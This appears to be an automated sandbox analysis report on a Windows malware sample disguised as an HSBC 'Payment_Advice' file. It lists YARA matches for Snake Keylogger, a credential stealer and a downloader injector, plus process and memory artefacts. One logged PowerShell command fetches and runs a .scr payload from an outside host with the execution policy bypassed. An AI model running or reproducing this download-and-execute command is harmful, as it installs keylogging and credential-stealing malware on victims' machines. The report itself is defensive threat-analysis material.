Jump to dropped file

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'"			Jump to behavior

Source: C:\Users\user\Desktop\Payment_Advice.scr.exe

Code function: 2_2_00408AF4 NtdllDefWindowProc_W,DestroyWindow,GetWindowLongW,GetWindowTextLengthW,RtlAllocateHeap,GetWindowTextW,DestroyWindow,UnregisterClassW,

2_2_00408AF4

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Code function: 2_2_0041ABC0	2_2_0041ABC0
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Code function: 2_2_0040C4D8	2_2_0040C4D8
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Code function: 2_2_0040E4A0	2_2_0040E4A0
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Code function: 2_2_0040EE6A	2_2_0040EE6A
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Code function: 2_2_00410EF0	2_2_00410EF0
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Code function: 2_2_00410290	2_2_00410290
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Code function: 2_2_00410359	2_2_00410359
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Code function: 2_2_0040FF70	2_2_0040FF70
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Code function: 2_2_00410313	2_2_00410313
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Code function: 2_2_0040AF87	2_2_0040AF87
Source: C:\Users\user\Desktop\Payment_Advice.scr.exe	Code function: 2_2_0040FF90	2_2_0040FF90
Source: C:\Windows\Temp\hadvices.scr	Code function: 15_2_00DFAA28	15_2_00DFAA28
Source: C:\Windows\Temp\hadvices.scr	Code function: 15_2_00DF9150	15_2_00DF9150
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_00DDC1F0	16_2_00DDC1F0
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_00DD6168	16_2_00DD6168
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_00DDB388	16_2_00DDB388
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_00DDC4D0	16_2_00DDC4D0
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_00DD6790	16_2_00DD6790
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_00DDC7B3	16_2_00DDC7B3
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_00DD98B8	16_2_00DD98B8
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_00DDCA93	16_2_00DDCA93
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_00DDFA10	16_2_00DDFA10
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_00DDBB5A	16_2_00DDBB5A
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_00DD4B31	16_2_00DD4B31
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_00DDEDF0	16_2_00DDEDF0
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_00DDBF13	16_2_00DDBF13
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_00DDE310	16_2_00DDE310
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_00DDE300	16_2_00DDE300
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_00DD35CB	16_2_00DD35CB
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_00DDB553	16_2_00DDB553
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_00F663C8	16_2_00F663C8
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_00F67550	16_2_00F67550
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_00F67540	16_2_00F67540
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_00F60FC0	16_2_00F60FC0
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_05577988	16_2_05577988
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_05578278	16_2_05578278
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_05573688	16_2_05573688
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_05570D50	16_2_05570D50
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0557D158	16_2_0557D158
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_05570D60	16_2_05570D60
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0557D168	16_2_0557D168
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0557CD10	16_2_0557CD10
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0557CD03	16_2_0557CD03
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_05570900	16_2_05570900
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0557D5C0	16_2_0557D5C0
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_055771FC	16_2_055771FC
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0557D5B0	16_2_0557D5B0
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0557C450	16_2_0557C450
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_05570040	16_2_05570040
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0557F871	16_2_0557F871
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0557C460	16_2_0557C460
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_05570015	16_2_05570015
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0557F418	16_2_0557F418
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0557C008	16_2_0557C008
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0557F428	16_2_0557F428
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_055708F1	16_2_055708F1
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_05570490	16_2_05570490
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0557F880	16_2_0557F880
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0557C8B8	16_2_0557C8B8
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_055704A0	16_2_055704A0
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0557C8A8	16_2_0557C8A8
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0557B758	16_2_0557B758
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0557B748	16_2_0557B748
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0557EB78	16_2_0557EB78
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0557EB68	16_2_0557EB68
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0557E710	16_2_0557E710
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0557B300	16_2_0557B300
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0557E720	16_2_0557E720
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0557EFD0	16_2_0557EFD0
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0557EFC1	16_2_0557EFC1
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0557BFF8	16_2_0557BFF8
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0557BBB0	16_2_0557BBB0
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0557BBA0	16_2_0557BBA0
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_05577BA8	16_2_05577BA8
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0557DE70	16_2_0557DE70
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_05573678	16_2_05573678
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0557DE63	16_2_0557DE63
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0557DA18	16_2_0557DA18
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_05578202	16_2_05578202
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_05577200	16_2_05577200
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0557DA09	16_2_0557DA09
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0557E2C8	16_2_0557E2C8
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0557B2EF	16_2_0557B2EF
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0557E2B8	16_2_0557E2B8
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0665BA40	16_2_0665BA40
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0665C6E0	16_2_0665C6E0
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_066556AF	16_2_066556AF
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0665A760	16_2_0665A760
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0665B3F8	16_2_0665B3F8
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_06658FA9	16_2_06658FA9
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0665D380	16_2_0665D380
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0665C090	16_2_0665C090
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_06658960	16_2_06658960
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0665CD30	16_2_0665CD30
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0665D9C8	16_2_0665D9C8
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_066511A0	16_2_066511A0
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0665ADB0	16_2_0665ADB0
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0665666B	16_2_0665666B
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_06656678	16_2_06656678
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_06656220	16_2_06656220
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0665BA2F	16_2_0665BA2F
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_06656215	16_2_06656215
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_06656AC0	16_2_06656AC0
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_06656AD0	16_2_06656AD0
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0665C6D2	16_2_0665C6D2
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0665D370	16_2_0665D370
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0665A750	16_2_0665A750
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_06656F28	16_2_06656F28
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_06653730	16_2_06653730
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_06656F19	16_2_06656F19
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_066577EF	16_2_066577EF
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0665B3E8	16_2_0665B3E8
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_066573A8	16_2_066573A8
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_066533A8	16_2_066533A8
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_066533B8	16_2_066533B8
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_06657398	16_2_06657398
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_06650040	16_2_06650040
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_06657C48	16_2_06657C48
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_06657C58	16_2_06657C58
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_06654430	16_2_06654430
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_06652807	16_2_06652807
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_06650006	16_2_06650006
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_06657800	16_2_06657800
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_06652818	16_2_06652818
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_066508E0	16_2_066508E0
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_066508F0	16_2_066508F0
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_066584F8	16_2_066584F8
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_066580A0	16_2_066580A0
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_066580B0	16_2_066580B0
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0665C080	16_2_0665C080
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_06650488	16_2_06650488
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_06650498	16_2_06650498
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_06655970	16_2_06655970
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_06650D48	16_2_06650D48
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0665595B	16_2_0665595B
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0665895B	16_2_0665895B
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0665CD20	16_2_0665CD20
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_06650D39	16_2_06650D39
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_06658508	16_2_06658508
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_06655DC8	16_2_06655DC8
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0665ADA0	16_2_0665ADA0
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0665D9B7	16_2_0665D9B7
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_06655DB8	16_2_06655DB8
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_0665518B	16_2_0665518B
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_06651191	16_2_06651191
Source: C:\Windows\Temp\hadvices.scr	Code function: 16_2_06655198	16_2_06655198

Source: Payment_Advice.scr.exe, 00000000.00000002.2099862846.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Payment_Advice.scr.exe
Source: Payment_Advice.scr.exe, 00000000.00000002.2102922301.0000000005200000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs Payment_Advice.scr.exe
Source: Payment_Advice.scr.exe, 00000000.00000002.2102353369.0000000003BF5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameExample.dll0 vs Payment_Advice.scr.exe
Source: Payment_Advice.scr.exe, 00000000.00000002.2102466582.00000000050E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameExample.dll0 vs Payment_Advice.scr.exe
Source: Payment_Advice.scr.exe, 00000000.00000002.2102184990.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs Payment_Advice.scr.exe
Source: Payment_Advice.scr.exe, 00000000.00000000.2096910038.00000000007B2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamemstlcp0_ipcodecvt_ip6.exeT vs Payment_Advice.scr.exe
Source: Payment_Advice.scr.exe	Binary or memory string: OriginalFilenamemstlcp0_ipcodecvt_ip6.exeT vs Payment_Advice.scr.exe

Source: Payment_Advice.scr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.Payment_Advice.scr.exe.2ce1910.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 15.2.hadvices.scr.3ad3d90.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 0.2.Payment_Advice.scr.exe.50e0000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 0.2.Payment_Advice.scr.exe.2ce1910.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 0.2.Payment_Advice.scr.exe.3c2e590.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 0.2.Payment_Advice.scr.exe.50e0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 15.2.hadvices.scr.4fc0000.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 0.2.Payment_Advice.scr.exe.3c2e590.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 15.2.hadvices.scr.3b679f0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.hadvices.scr.3b679f0.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.hadvices.scr.3b679f0.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.2.hadvices.scr.3b679f0.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 16.2.hadvices.scr.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.hadvices.scr.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.hadvices.scr.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.2.hadvices.scr.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 15.2.hadvices.scr.3b88420.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.hadvices.scr.3b88420.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.hadvices.scr.3b88420.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.2.hadvices.scr.3b88420.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 15.2.hadvices.scr.3b88420.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.hadvices.scr.3b88420.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.hadvices.scr.3b88420.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.2.hadvices.scr.3b88420.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 15.2.hadvices.scr.3b679f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.hadvices.scr.3b679f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.hadvices.scr.3b679f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.2.hadvices.scr.3b679f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.Payment_Advice.scr.exe.2c01dc8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 15.2.hadvices.scr.2a91ca0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 0.2.Payment_Advice.scr.exe.2bff588.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 15.2.hadvices.scr.2a8f460.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 00000010.00000002.3355386659.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000010.00000002.3355386659.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.2102466582.00000000050E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 0000000F.00000002.2334857873.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000F.00000002.2334857873.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: hadvices.scr PID: 8112, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: hadvices.scr PID: 8112, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: hadvices.scr PID: 5648, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: hadvices.scr PID: 5648, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: 0.2.Payment_Advice.scr.exe.50e0000.4.raw.unpack, DarkListView.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Payment_Advice.scr.exe.3c2e590.3.raw.unpack, DarkListView.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 15.2.hadvices.scr.3b88420.2.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 15.2.hadvices.scr.3b88420.2.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
